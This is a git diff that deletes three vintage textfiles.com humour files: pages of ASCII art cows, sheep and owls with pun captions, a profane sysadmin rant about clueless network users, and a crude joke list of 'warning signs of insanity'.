- ------- )
- | || __0 \\\||||///
- | || () _____ = 00000000 = <----- radioactive waste
-
- Cow after biology major Cow after Physics Major
- is finished with it is finished with it
-
- | |
- | |
- (__)| |
- (__) (__) (@@)| |
- (oo) (oo) |\/-===< |
- /-------\/ *____-------\/ | | |
- / | || // // | | |
- * ||----|| >='/-----// /\|___===< |
- __^^____^^__/ ___^_____^^__/ __oo____*o__. | |
- oo oo oo oo `////\\\\
-
- Cow on skate-board Cow at running Cow without skate-board
- (watch out!)
-
-
-
- /\__ Sheeping sleep
- @@@@@@@@@@@ - \ ..er,I mean
- @@@@@@@@@@@@@@___/ Sleeping sheep
- @@@@@@@@@@@@@@@
- @___@@@@@@@@@@@__@ /\_____
- / O \
- / \
- @@@@@@@@@@ /
- Concieted @@@@@@@@@@@@@@_______/
- sheep. @@@@@@@@@@@@@@@
- @ @@@@@@@@@@@
- ___ || ||
- / | ~~ ~~
- / - \
- \ @@
- @@@@@@@@@
- @@@@@@@@@@______#
- @@@@@@@@@@_______# /\___
- @@@@@@@@@@@@ @@@@@@@@@@ @ \ Had to put this one in,
- @@@@@@@@@@@@ @@@@@@@@@@@@@@___/ really,didn't I?
- @@@@@@@@@@=@@@@@@@@@@@@@@@ __
- @@@@@@@\ \ @@@@@@@@@@@ ||
- @ / / || || ||
- ~~~ ~~ ~~ ||
- || __
- |\\ ||
- ||\\ ||
- || \\ ||
- /\__ || \\||
- @@@@@@@@@@ O \ ||___\||________________________
- @@@@@@@@@@@@@___/ ||\ || . ....\
- @@@@@@@@@@@@@ || \ || . . . . \
- @@@@@@@@@ || \ || . . \
- ( >> >> || \|| . . . \
- ~~ ~~ \ || _______________ \
- ( \ ||______ | HIGH JUMP |_______\
- \ ||| \_____________/ |
- ( @@@@@@@@@@@@@@@ \||| || |
- |||____________||______________|
- ||
- WOOLY JUMPER. ||
- ||
- ~~
- ___
- / |
- / - \
- \ @@
- @@@@@@@@@
- @@@@@@@@@@______# (_____)
- @@@@@@@@@@_______# ( @ @ )
- @@@@@@@@@@@@ ---------\ /
- @@@@@@@@@@@@| \O/ Sheep performing an act of buggery
- @@@@@@@@@@=| | on a cow.
- @@@@@@@\ \|---------||
- @ / /|| ||
- ~~~~~ ~~
-
-
-
- The starsheep enterprise....
-
-
- (\___/)
- ( O O )
- /@@\ \ /
- @@@@@@@@@@@@@@@@@@@@@@\ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\_/
- @@@@@@@@@@@@@@@@@@@@@/ @@@@@@@@@@@@@@@@@@@@@@@@@@ _________
- @@@ @@@@@@@@ _____/
- @@@ @@@@@@ __/ . .
- @@@@@@@@@@@@@@@@@@@@@@@@@ _/ .
- @@@@@SHP-1701@@@@@@@@@@@-( _/ . .
- @@@@@@@@@@@@@@@@@@@ / . . .
- _/.
- /. .
- /. . .
- / .
- /. . .
- / . .
-
-
- (\ /)
- ( \_/ ) (\_/)
- @@@@@@@@@@|~ ~| @@@@@@@@@@|===|
- @@@@@@@@@@@@\O O/ @@@@@@@@@@@@\___/
- @@@@@@@@@@@@@@\_/ @@@@@@@@@@@@@@\o/
- @ @@@@@@@@@@@ @ @@@@@@@@@@
- || || || ||
- ~~ ~~ ~~ ~~
- VULCAN SHEEP. ROBOSHEEP
-
-
-
- ~~ ~~
- || ||
- @@@@@@@@@@@@@@@@@ DEAD SHEEP.
- @@@@@@@@@@@@@@@@@@@
- @@@@@@@@@@@@@@@@@@@\___
- @@@@@@@@@@@@@@@@@@ \
- @@@@@@@@@@@@@@@@@ -___/
- \/
-
- ___________________
- ______________ | || |
- | ZORBA'S | | || |
- |Greek | | #####________#### |
- | Takeaway.. | | ####| . ..|### |_ (((())))
-############################# | #####| . ..|#### |\\ ( )
- | #####| . ..|#### | \\ ( O O )
- | | ..| | \\ ___\ __ /__
- | ######| ..|##### | \\ / \__/
- | ######| ..|##### | \\ /
- | ######\____/##### | \\ / /|
- | ####### || ###### | \\ / / | ZORBA'S
- | ' || ' | @@/ / |
- | || ' | <@@/ |
- |\_________________/| @@ |__________
- ######################################|**********
- |||||||||||||||||||||||||||||||||||| |*****|****
- |||||||||||||||||||||||||||||||||||| |*****|****
-_______________________________________________________________________________
-_______________________________________________________________________________
-|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
- DEAD SHEEP IN A MORE FAMILIAR FORM.
-
-
-
-
-##############################################################################
-##############################################################################
-____________________________/ ____ ____ ____ ____
- || || || || || | | | | |~~~~| | |
- /__\ /__\ (__) (__) (__) | | |~~| | | |~~|
- \~~/ \ / \ / \ /
- || || || ||
- (\___/) ______________________________
- (O O)
- @@\ /@@
- @@@@@\_/@@@@@
- /@@@@@@@@@@@@@\ @@ ## @@
- @@@@ ___/ / /@@@@@@@@@@@\ \ @@ ## _||_ @@@@
- C| | \ // / / @@@@@@@@@@@ \ \ || || / LA \ | |)
- \__/ || @@@/ @@@@@@@@@@@ \@@@ || || | | |__|
-###############################################################################
-###############################################################################
-|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-|||||||||||||||||||||||||||| U N I O N B A A ||||||||||||||||||||||||||||||||
-|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-
- BAA - TENDER.
-
-
-
- /\____
- / O \
- @@@@@@@@___/
- @@@@@@@@@@ / (
- @@@@@@@@@@======@--/---)_/)
- @@@@@@@@@@@ O | |
- @@@@@@@@@@@ @@@@@@@@
- @@@@@@@@@@@ #############
- BAA - BER. @@@@@@@@@ ###############
- || || ###############
- ~~ ~~ ###############
- ########## #############
- # # |\ /|
- # # ||\ /||
- # # ~~ | | ~~
- ________________#________#_____________|_|______________________
-
-
-
-
- BAA - RT SIMPSON.
- |\/\/\/\/|
- | |
- | O O |@@@@@@@@@@@@@@@@@@@@@
- \ /@@@@@@@@@@@@@@@@@@@@@@@@
- \ __ /@@@@@@@@@@@@@@@@@@@@@@@@@@
- \__/@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- @@@@@@@@@@@@@@@@@@@@@@@@@@@ @
- @@@@@@@@@@@@@@@@@@@@@@ @
- | | | |
- | | | |
- ~~~~ ~~~~
-
-
-
-
- (\___/)
- @@@@@@@@@@@| O O|
- @@@@@@@@@@@@@@\ /
- @@@@@@@@@@@@@@@@\\__/ Hic!
- @@@@@@@@@@@@@@@@@\_U <--- Pissed BAA - stard.
- @@@@@@@@@@@@@@@ Hic!
- || || |@@@|
- ~~ ~~ C| |
-#################### \___/ _____
-################################ _/ / \_
- _/ / \_
- / / \
- \_____________/
- |O O|
- \ /
- @@\ - /@@
- /@@@@\_/@@@@\\
- /@@@@@@@@@@@@@ \
- / /@@@@@@@@@@@@ _\
- / /@@@@@@@@@@@@@@ \\
- |______ @@@@@@@@@ \\
- @@@@@@@@@@@@@@@ @@
- @@@@@@@@@@@@@
- @@@@@@@@@@@@@
- @@@@@@@@@@@
- || @ ||
- ~~ ~~
- NAPOLEONIC SHEEP.
-
- (\___/)
- @@@@@@@@@@@@@@|O O|
- @@@@@@@@@@@@@@@\ /
- @@@@@@@@@@@@@@@\ /
- @@ @@ \_/
- @@ @@
- @@ @@
- @@ @@
- @@ @@ Baa Stool
- @@ @@
- @@ @@
- @@______@@
- @@______@@
- @@ @@
- @@ @@
- @@ @@
-
-
-
- BAA - ROOOOOM!!!
-
- __________________________
- / (\__/) === \
- ___ / |O O| \ ___
- |___|/___@@\__/@@___________________\|___| .
- /________________________________\ .
- || \=======*=======/ || . .
- ################################## ...
- .... . . .. \____________|BAA 1|_____________/ . ....
- . . . .. #### ------- #### ... . . .
- . ..... #### #### .. ... .. .
-
-
-
- ___ v v v ___ ___
- <*,*> <*,*> <*,*> <`,'> <*,*>
- [`-'] [`-'] [`-'] [`-'] =^`-'^=
- -"-"- -"-"- -"-"- -"-"- " "
- owl punk owl owl with antlers chinese owl flying owl
-
- ___ ___ ___ ___ ___
- <+,+> <@,@> <*,*> <-,-> <$,$>
- [`-'] [`-'] [`-'] [`-'] [`-']
- -"-"- -"-"- -"--- -"-"- -"-"-
- drunk owl owl junkie one legged owl shrewd owl greedy owl
- _
- ___ ___ _|||_ /_\
- <#,#> <o-o> <*,*> <*,*>
- [`-'] [`-'] [`-'] [`-']
- -"-"- -"-"- -"-"- -"-"-
- T-V owl owl with glasses owl with top-hat owl with fez
-
- ___ ___ _____ _
- <*,*> <*,*> /o \_/ | * *
- [`-// [`o'] [ _ | "owl"
- -"-"- -"-"- `-----' `-'
- owl with sling medalion owl surreal owl owl in cave owl
-
- ___ ___
- <*,-> <*,*>
- [`-'] [`S']
- -"-"- -"-"-
- confidential owl super owl
-
-
- (__)
- (oo) U
- /-------\/ /---V
- / | || * |--| .
-* ||----||
- ^^ ^^
-
-Cow at 1 meter. Cow at 100 meters. Cow at 10,000 meters.
-
-
-
- (__) )__( vv vv
- (oo) (oo) ||----|| *
- /-------\/ *-------\/ || | /
- / | || / | || /\-------/
-* ||----|| / ||----|| (oo)
- ^^ ^^ vv vv (~~)
-
-American Cow Polish Cow Australian Cow
-
-
- (__) (__) (__)
- (oo) ____ (oo) _---_(oo)
- /-------\/ /- --\/ /- -\/
- / | || / | || /| ||
-* ||----|| * ||___-|| * ||___-||
- ^^ ^^ ^^ ^^ ^^ ^^
-
-Freshman Cow Freshman Cow Freshman Cow
-Arriving at RIT After the "Freshman 15" After the "Freshman 20"
-
-
- (__) (__) (__)
- (OO) (@@) (xx)
- /-------\/ /-------\/ /-------\/
- / | || / | || / | ||
-* ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
-
-Cow who drank Jolt Cow who ate Cow who used Jolt to wash
- psychadelic mushrooms down psychadelic mushrooms
-
-
-
- [5m(__) [7m(__) [0m [7m [5m
- [0m
- [5m(oo) [7m(oo) [0m [7m [5m
- [0m
- [5m/-------\/ [7m/-------\/ [0m [7m [5m
- [0m
- [5m/ | || [7m/ | || [0m [7m [5m
- [0m
- [5m* ||----|| [7m* ||----|| [0m [7m [5m
- [0m
- [5m^^ ^^ [7m^^ ^^ [0m [7m [5m
- [0m
-
-Cow within 100 miles Cow within 10 miles Cow within 1 mile
- of Chernobull of Chernobull of Chernobull
-
-
-
-
-
-
- (____) (____) (____)
- (oo ) (o o) ( O O)
- /-----------\ / /-----\ /---- /-----------\ /
- / || | \/ / | | \/ | / || | \/
- / || |||| \ | | | | | / || ||||
- * ||||-----|||| *| | |-----| | | * ||||-----||||
- /\/\ /\/\ /\ /\ /\ /\ ^^^^ ^^^^
- This cow belonged This was Salvatore No one was sure whether
- to Pablo Picasso Dali's favorite cow M.C. Escher's cow had four
- legs or eight
-
-
-
- . . And now, the Golden Bovine Awards!
-
- (__)
- (oo) (_)
- /-------\/ V
- / | || /G\
- * ||----|| ___[B]___
- ^^ ^^ | |
-
-
- \
- (__) (___)
- (oo) (_) (O O)
- /-------\/ V \ /---------\
- / | || /G\ O || | \
- * ||----|| ___[B]___ ||-----|| *
- ^^ ^^ | | ^^ ^^
-
-
-
-
-
-
-
-..and with its onboard floating point
-and dual I and D cache buffers, the
-CLIPPER will blow the doors off of any
-micro in its class. QUICK, ONE'S COMING !!!
- \ \
- \ \
- (__) (__) (__)
- (oo) (oo) (oo)
- \/ \/ \/
- /----\ /----\ /----\
- /| |\ /| |\ /| |\
- ^ | | ^ ^ | | ^-+ ^ | | ^
- | | | | |C| | |
- /----\ /----\ +-+ /----\
- / \ \ / \ \ / \ \
- ^ * ^ ^ * ^ ^ * ^
-
-
-
-
-
-
-
-
-
-
- MOO Oh, how boring it must
- / be to be a cow.
- (__) (__) \ (__)
- (oo) (oo) _______ (oo)
- /-------\/ \/-------\ // ||\ \ \/-------\
- / | || || | \ _____//___||_\ \___ || | \
- * ||----|| ||----|| * ) _ _ \ ||----|| *
- ^^ ^^ ^^ ^^ |_/ \________/ \___| ^^ ^^
-______________________________________\_/________\_/__________________________
-
-
-
-
-
-
-
-
-
-..So explain to me again how
-they were able to acheive
-zero wait states...
- \ It's party time!
- \ \
- (__) (__) (__)
- (oo) (oo) (oo)
- \/ \/ \/
- /----\ /----\ /----\
- /| |\ /| |\ /| |\
- ^ | | ^ ^ | | ^-+ ^ | | ^
- | | | | |C| [BUD]| |[BUD]
- /----\ /----\ +-+ [SIX]/----\[SIX]
- / \ \ / \ \ / \ \
- ^ * ^ ^ * ^ ^ * ^
-
-
-
-
-
-
-
-
-
-
- (__) (__) __)
- (oo) (oo) o)
- /-------\/ /-------\/
- / | O || * ||----||
-* ||----|| || ||
- ^^ ^^ ^^ ^^
-Cow that gives Cow that gives Cow that gives
-(W)hole Milk. Low-Fat Milk. 2% Milk.
-
-
-
- (__)
- (dd) .
- /-------\/
- / | || U .
-* ||----|| /---V .
- ^^ ^^ * |--| .
-Cow that gives Cow that gives Cow that gives (gave)
-Vitamin D Milk. Condensed Milk. Evaporated Milk.
-
-
-Warning: Two of the last three are crude.
-
-
-
- (__)
- __(oo)
- (__) / \/ (__) (___)
- milk / \\ (oo) (O O)
- /-------\/ /| /-^^---\/ /--------\ /
- / | || / | /| || / | ||O
-* ||----|| * || ||----|| * ||@\---||
- ^^ ^^ ^^ ^^ ^^ ^^ ^^
-Cow that gives Cows that give Cow that gives
-Pasteurized Milk. Homogenized Milk. Cream.
-
-
-
-
-Here are the national standards for wheel-base classification:
-
-
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-----------\/ /---------\/ /-------\/ /-----\/
- / | || / | || / | || / | || U
-* ||--------|| * ||------|| * ||----|| * ||--|| /---V
- OO OO OO OO OO OO OO OO * O--O
-
- Full-Size Cow Mid-Size Cow Compact Cow Sub-Compact Cow Yugo
-
-
-
-These are some of the various models offered:
-
-
- __ (__) ______ (__) (__) (__)
- / \ (oo) / \ (oo) (oo) \ (oo)
- / ---\/ * --\/ /| |---\/ @ ---\/
-* | || | || * |______| || /| || U
- ||----|| ||--------|| ||--------|| * ||------|| /---V
- OO OO OO OO OO OO OO OO * O--O
-
-Hatch-Back Station Wagon Pick-up Truck Convertable Roller Skate
-
-
-
-Although some people like to customize their cows:
-
-
- (__) \
- (oo) \
- /-------\/ (__) \__)
- / | || /---_ (__) (oo) (oo)
-* ||----|| / | -_(oo) /-----------\[] /--------\/
- OOO OOO * ||-_ |\/ / | |[] /|=======|| * U
- O O O O || -_|| * ||--------|| * ||------||( \---V
- OOO OOO OO OO OO OO @@ @@ O--O
-
-Beach-comber's A Low-Rider Chevy Impala Aluminum alloy Yugo with
- Deluxe with Fuzzy Dice rims, fog lamps, rear
- cb radio, and spoiler
- custom pin-striping
-
-
-
-Then there are the luxury cows:
-
-
- (__)
- (oo)
- /---------------------------------------------\/
- / | || U
-* ||------------------------------------------|| /-----V
- OO OO * O----O
-
- Stretch Limo Yugo Limo
-
-
-
-And the workforce of the interstate cowing industry:
-
-
- /------------------------------------------
- / | |
- / | Upstate Milk Cooperatives | (_____)
- / | | ( O O )
- / | | \ /
-* |________________________________________|___\ /
- OO OO OO OO O . .__.,,
-
- The Eighteen Hoofer Yugo after being
- run over by the 18 hoofer
-
-
-Here is Hugh Heifer himself, with a couple of his PLAYBULL Bunnies.
-Of course, whenever Hugh is around the mansion, he always wears his
-comfortable silk bathrobes.
-
- \ / \ /
- \__/ (___) \__/
- (oo) (o o) (oo)
- /-------\/ /---+----\ / \/-------\
- / | || / | | ||O || | \
-* ||----|| * ||-+---|| ||----|| *
- ^^ ^^ ^^ ^^ ^^ ^^
-
-
-Meanwhile, in the photo studios in the back of the mansion, we see next
-issues centerfold posing in front of the camera.
-
- (__) O
- (o[o]| * (__)
- /-------\/ v / (oo)v
- / | ||_/ \-------\/ \
-* ||----| v____/ / \/
- ^^ ^ v___\____v/___/
-
-Probably an RIT Is this one beautiful
-photo graduate bovine, or what?
-
-
- (_ _)
- (__) (o o)
- (oo) \ /-------\
- /-------\/ || | \
- * ||----|| ||----|| *
- ^^ ^^ ^^ ^^
-Strawberry Shortcake Banana Split
-
- (__) (__) *
- (oo) (oo) /
- /-------\/ \/-------/
- / | || || | o
-* ||----|| ||----|| ooo
- :: :: ^^ ^^ oooooo
-Your team skates Like a pile of . . .
-
-(__) (__)
-(oo) (oo)
- \/-------\ /-------\/
- \\ \ \ / / //
- \\----\\ * * //----//
- ^^ ^^ ^^ ^^
-Shift to the left Shift to the right
-
- (__)
- (oo)
- /--\/--\ (__)
- / | | \ (oo)
-^ | | ^ ---\/----<
- /----\ | \-+-<
- / \ \ | |
- ^ * ^ *__|__-+-<-<
-Stand up Sit down
-
- (__) * (__)(__)
- (xx) \ (@@)(oo)
- /-------\/ >---\------\/ \/-------\
- / | || | ||>---| || \
- * ||----|| |-----|| |----|| *
- ^^ ^^ ^ ^^ ^ ^^
-Fight, fight, fight!
-
\ No newline at end of file diff --git a/.md/thoughts/txt/textfiles.com/lusermeetings.txt b/.md/thoughts/txt/textfiles.com/lusermeetings.txt deleted file mode 100644 index cea504b..0000000 --- a/.md/thoughts/txt/textfiles.com/lusermeetings.txt +++ /dev/null @@ -1,275 +0,0 @@ - - SOCIAL OBSERVATIONS ABOUT NETWORK LUSERS - - A General TXT on My Personal Gleanings - and Experience with Network Neophytes - and the Everyday Joe/Jane "luser". - ---------------------------------------------------------------------------- - -"There is a principle which is a bar against all information,which is proof -against all arguments and which cannot fail to keep us in everlasting -ignorance............that principle is contempt prior to investigation." - -Herbert Spencer ---------------------------------------------------------------------------- - - BY: F A R T B L O S S O M - ---------------------------------------------------------------------------- - - Sept. 8, 2004 - ;)_ ---------------------------------------------------------------------------- - -To quote a saying by the infamous Bastard Operator from Hell, "They never -learn." No statement written about network lusers has ever rung more true -than that simple phrase. People simply do not learn, they do not want to -learn, they fight the process and the more one tries to enforce learning or -encourage learning, more and more resistance is met. - -Example from the open road: A guy pulls out in front of a truck after -running a red light and narrowly misses getting hit. Two weeks later at -the same intersection he pulls the same stunt. I have seen this scenario -repeated over and over right in front of my house, at the local K-Mart -red light, and on main street in the local town at the busiest inter- -section in the entire city. Same cars same people same scenario and -they never learn. - -The only time they get the hint is when luck runs out and they end up -in the hospital or dead. Like Mother used to say of my dear sister, -"She won't believe I will whip her until she feels the sting of the -switch." And usually when they get the hint, if the live through the -accident they have the fucking audacity to sue the person who hit them -even though it wasn't the other person's fault. - -I write this from the (albeit biased) standpoint and position of veteran -sysad for numerous WAN/LAN's for about 8 years. This is what I do, how -I make my money and suffice it to say dealing with end users has caused -no small amount of stress in my life over the years. - -When I first began this task of luser management, along with workstation -break/fix and WAN/LAN sysad duties back in early 1995 I kept having the -feeling that I was being left behind. I didn't know much about computers -or networking back then, so I maintained a constant effort over the years -to learn all I could about my newly acquired craft. When I finally began -managing my own systems as senior IT I finally got appreciation for the -oft repeated phrase, "In the land of the blind the one-eyed man is king." - -When I, the humble meek computer geek fizzled onto the sysad scene -I discovered a profound truth. I KNOW MORE THAN THEY DO. I was stunned -that all of the talented degreed and credentialed folks I was serving as -sysad for knew ABSOLUTELY FUCKING NOTHING about computers and eight years -later the SAME FUCKING PEOPLE STILL DON'T KNOW ANYTHING ABOUT COMPUTERS. - -THAT SIMPLE FACT ABSOLUTELY FLOODED AND FLOORED MY SIMPLE HICK MIND AT THE TIME! How could I know more than someone with a PhD when I barely made -it through the 12th grade? - -They dont want to know about computers, they want it all done for them -since they are too fucking stupid and lazy to learn something new. This -is not only referring to older lusers, but the young ones as well. They -churn them out of the big industry mechanism stupid. The college kids -exist to make a professor smile, so they can get an A. Don't think for -yourself, think the way I tell you and I smile on your Doctorate. - -"Madness," as biblical King Solomon might say as the Preacher, all is madness." - -------- topic switches abruptly ------------------------------------------ - -I can't tell you the number of times I get blamed for walking past a server -room and when the power cycles I get bitched at because it must've been -something I did. After all I was in the area. And I am an asshole in -their eyes, therefore it isn't the fault of the power company, since I -have all these fucking magical TCP/IP wizard telepathy powers I control -the fucking power grid. - -I hate stereotypes. - -(A quick sidenote, I often mention to my wife that this is what racial discrimination must feel like. It sucks to be on the shitty end of a preconcieved notion.) Or as Frank Zappa might say, it is called -"SMELLING THE GLOVE." - -About my assistant, she is an excellent pc tech and is wonderful with -the dear lusers whereas I usually come across as a dickhead or asshole -to them. I don't know why since I try like hell to be nice, I guess they -can't handle a non-degreed ex-vet bossing their superior padded PHD -asses around in the computer arena. Alas that is the corporate curse of -the humble yet knowlegeable sysad. You know more than they do therefore -you are an asshole. - -I cite examples of ineptitude: - -1. Most people I work with don't know how to create an icon in Windows. -2. Most people choose passwords like this: - baby daddy baseball triplets (their initials) (their birthday) -3. Most lusers have a memory as long as my dick. -4. Most lusers put passwords in desk drawers, under mousepads and my - personal favorite, they WRITE IT ON THE FUCKING MONITOR ON A DAMN - STICKY NOTE. So much for network security. -5. Most lusers refer to Windows 97 as their operating system or Microsoft - as their operating system when asked. -6. Most lusers can't differentiate between physical RAM and a hard drive. - Example: How much memory do I have? Can I get rid of some of it to - free up space on my machine? -7. Most lusers can barely operate MS Word -8. The most frequent question I am asked on initial PC orientation of - new employees is, "What's a URL?" -9. The next question I get, even though I manage over 1000 nodes, 20 - WAN links and over 5000 users is, "Do you read our email?" - -FUCK NO I DON'T READ YOUR EMAIL. DON'T FLATTER YOUR LITTLE SELF. I HAVE -SO MUCH WORK TO DO SUPPORTING YOUR CONSTANT DESTRUCTION OF MY PC'S THAT -I DON'T HAVE TIME TO READ MY OWN EMAIL. - -10.I have once watched a former sysad friend of mine convince a lady - who was a veteran computer trainer that her problem was leaking - packets. He actually had her on the floor looking for packets that - fell out of her laptop connector and out of the wall jack, NO SHIT! - I almost pissed myself I laughed so hard. And this lady was teaching - other employees! Isn't that novel? The Bible tells us "if the blind - lead the blind, both fall into the ditch." - -11.My favorite bitch of all: "Do you do computer work on the side?" - Read this to mean, "I want my pc/modem/monitor/hard drive/data/mouse/ - keyboard/floppy/scanner/printer fixed absolutely free because after - all I want something for nothing and you must give it to me because - I am a luser and can tattletale to the boss that you are mean." - -(If I have to fix one more Packard Bell Legend, one more shitty ass - Hp Pavillion I am going to go ballistic on somebody!!!!!!) - -So you might ask what is the point of this article. Mainly I wanted to -vent and since I am such an asshole (I am really not, ask my wife) I -have no other folks to vent to. You might also ask, "If you hate the -lusers so much why do you keep staying there?" Good question. This -seems to be the best place for me to further my career. - -I have excellent access to the latest and greatest technology. -Plus its hard to find a job in this recessive economic downturn. All -of the sysads are being axed for cheaper prices in India. - -It seems everyone wants a degreed sysad and I don't have one. While -most were busy going to college and fucking their sweethearts and playing -at being a man, I was busy serving my country during Desert Storm in the -good old US MILITARY. So I don't have a fucking degree, looks like I am -stuck here until someone feels sorry for me. :( I, just as the simple -little lusers I faithfully and dutifully serve, have a wife and home -and bills and I have to eat too. - -The main point I wanted to get to is this. Most people are sheep. Just -like Jesus said in the Bible, "All like sheep have gone astray." True -and even I have done some dumb stuff in my life. But I try like hell to -learn and not repeat mistakes. Your average Joe and Jane luser does not. - -First, they hate the machine. They resent it. They fear it and all who -come in defense of the PC. They don't want it. Management forces them -to use it and won't have it any other way. The luser has bills to pay -and kids and a husband or wife at home to take care of, therefore the -machine is a hated entity because it is forced upon them. True enough. -They are hereby stuck in a hard position. - -They hate technology but are forced to use it, the economy won't let them -leave for a better job, their home life probably sucks ass, therefore -the popular pastime is, "Hey, lets take it out on the computer guy!" -"He has no life, its his fault." I am the embodiment of pure human to -machine interface. I am the computer come in man-form to their pathetic -little cubicles. I am therefore the target of all their frustrations. -Or as I have told my wife, I am like an ambulance driver. I usually get -them when its almost too late. I really really want to help, and I really -want what's best for them. I swear to God I do. - -Persecution complex you say? Perhaps. Schizophrenic musings of an -intelligent lunatic? Fuck you for noticing. I just gave up Zoloft -for cigarettes again. You believe whatever the hell you wish. At least I -am honest with myself. Narcissist? Fuck no. Anti-social? You bet, a -learned behavior. These stomach pains are for real motherfucker. - -A lot of lusers are close to retirement and hatefully despise technology. -I have often heard even our CEO state, "I wish we could just somehow -get rid of all of the computers and go back to the old way." I actually -heard that oral turd dispenser say that on numerous occasions. - -The CEO also mentioned (on the 15th time he got a complaint) that I was mean, -to the poor, unfortunate always right and perfect lusers, and he -threatened to fire me. I in a super nice way told him to fire me now -and not to wait. Don't fuck around, do it NOW! Right fucking now! -Don't dangle that carrot, don't threaten me. I will flip fucking hamburgers -if that is what I have to do. I am not too proud. - -He hesitated and I am still not fired five years later. He won't -fire me and do you know why? It would cost him double to pay someone now -to replace me and that person would probably have a learning curve of at -least 18 months to get up to speed. Plus it would take a new sysad -about 1 year to restabilize what I picked up as a large fucking cobbled -together excuse of a WAN/LAN. - -I literally rebuilt this unorganized grabastic hunk of shit cheap WAN -from scratch. They had no program until I got here. No pride because I -fought, scratched, bitched, whined, complained, and prayed prayed prayed to -God every step of the way. So I guess God gets the credit, not me. - -Let me put this to you. Nobody is permanant. Everyone is expendable and -even I never forget this rule. I am quite sure they could find some little -eager upstart to take my desk, my terminal and my job from me. And the -sad thing is the little shit probably has a college degree. He may even -know a little about networks, perhaps the OSI model. - -But do you know the one thing Mr. College doesn't have that I have? -Experience with all sorts of people and machinery to be exact. I was -in a maintenance and electronics career for 15 years before I became sysad. -I have worked on everything from radio to microwave, to weapons systems to -VCR's. I have soldered boards, built houses, mixed paint, and broken -into combination locks (legally). I have shoveled shit, helped calves -give birth and made homebrew antennas to pick up long range radio stations -with. I have plowed fields and rebuilt engines, I have been both grounded -and on top of the world. - -What else do I have that Mr. College still shitting yellow doesn't? I have -the heart, mind, body, and soul of a sysad. Good admins are made, not -born. It takes work to get up every day even though you feel like never -getting out of bed again and have taken 81 asschewings this year already -for shit they keep piling on you that you have yet to finish, and haven't -enough time or techs to help you. - -What else do I have Mr. Fucking Know it all college PUNK doesn't have? -I care about my lusers. I really really do. I don't want them to lose -their data, or their pc to a virus. Hell no! - -What else do I exhibit that Mr. College fresh wannabe doesn't? I am true -to my God and to myself. I do not like to lie to me. I know what I know -and that is all I know, but I want to know more and more. I spend hours -upon hours in books, on the 'Net trying to learn one more thing to insulate -my lusers from the real world of computing. Anything I can do to make their -lives and mine easier that is what I look for. Nothing else will do. -I want to make them happy. Yet they still fucking fight me and turn me -in because I say what they don't like, I tell them the truth. Yes the -drive has crashed and you lost everything. They can't handle that. - -One more final thing I have that college boy doesn't. I have humility. -Humility of a kind that is born in the crucible of hard ass mind numbing -deadlines, and thankless work and hard decisions daily. My humility was -born of numerous ass-chewings, numerous deflations of my pride. Humility -is setting up Netware 41 times on the same fucking box until you get it -right, learning each step of the way. Humility is working on a pc for -three weeks, only to find out it was something retarded all along like -an unseated stick of ram. Be humble, be available, but be wise as a -serpent and harmless as a dove. - -I have news for you lusers. Computers are not going away. They are here -to stay and sysads like me are always going to be needed. Be nice to us -because there will come a fateful day when your drive crashes, you get a -virus and you will need our services. You do reap what you sow, that much -I have learned in all my trials and tribulations of life in general and as -a sysad. - -It is getting quite late and I am quite sure I have wasted enough of your -valuable time reading this. I think the BOFH put my real feelings in print -best: "I know I have that LAN cable I spliced into the power cord somewhere. - -" MWUAHHHAAAAHAHAHAHAHAHAHAHA!!! - -FART BLOSSOM -SOMEWHERE DEEP IN THE BOWELS OF THE NEW SOUTH -MAY SHE RISE AGAIN! - - -EOF
\ No newline at end of file diff --git a/.md/thoughts/txt/textfiles.com/signs_of_insanity.txt b/.md/thoughts/txt/textfiles.com/signs_of_insanity.txt deleted file mode 100644 index 993a0c8..0000000 --- a/.md/thoughts/txt/textfiles.com/signs_of_insanity.txt +++ /dev/null @@ -1,98 +0,0 @@ - The Warning Signs Of InSaNiTy
- ---------------------------------------
-
- 1. Your friends tell you that you have been acting strange lately, and
- then you hit them several times with a sledgehammer.
- 2. Everyone you meet appears to have tentacles growing out of places that
- you wouldn't expect tentacles to be growing from.
- 3. You start out each morning with a 30-minute jog around the bathroom.
- 4. You write to your mother in Germany every week, even though she sends
- you mail from Iowa asking why you never write.
- 5. Every time you see a street sign, you have a tremendous urge to
- relieve yourself on it.
- 6. You wear your boxers on your head because you heard it will ward of
- evil dandruff spirits.
- 7. You're always having to apologize to your next door neighbor for
- setting fire to his lawn decorations.
- 8. Every commercial you hear on the radio reminds you of death.
- 9. People stay away from you whenever they hear you howl.
-10. Your breath smells more and more like squirrel dung each passing day.
-11. You laugh out loud during funerals.
-12. When your doctor tells you to say ah, you yell out "RAPE! RAPE!"
-13. Nobody listens to you anymore, because they can't understand you
- through that scuba mask.
-14. You begin to stop and consider all of the blades of grass you've
- stepped on as a child, and worry that their ancestors are going
- to one day seek revenge.
-15. You have meaningful conversations with your toaster.
-16. Your father pretends you don't exist, just to play along with your
- little illusion.
-17. You collect dead windowsill flies.
-18. Everytime the phone rings, you shout, "Hey! An angel just got its
- wings!"
-19. You like cats. Especially with mayo.
-20. You scream "I've got a knife!" to people who try to sell you things.
-21. You scream "I've got a knife!" to people at your family reunion.
-22. You cry at the end of every episode of Gilligan's Island, because they
- weren't rescued.
-23. You put tennis balls in the microwave to see if they'll hatch.
-24. Whenever you listen to the radio, the music sounds backwards.
-25. You have a predominant fear of fabric softener.
-26. You wake up each morning and find yourself sitting on your head in the
- middle of your front lawn.
-27. Your dentist asks you why each individual tooth has your name
- etched on it, and you tell him it's for security reasons.
-28. Melba toast excites you.
-29. When the waiter asks for your order, you ask to go into another
- room to tell him, because "the napkins have ears."
-30. You tend to agree with everything your mother's dead uncle tells you.
-31. Every time you see the commercial for the Hair Club For Men, you think
- to yourself, "I think I'll kill the pope today."
-32. You call up random people and ask if you can borrow their dog, just for
- a few minutes.
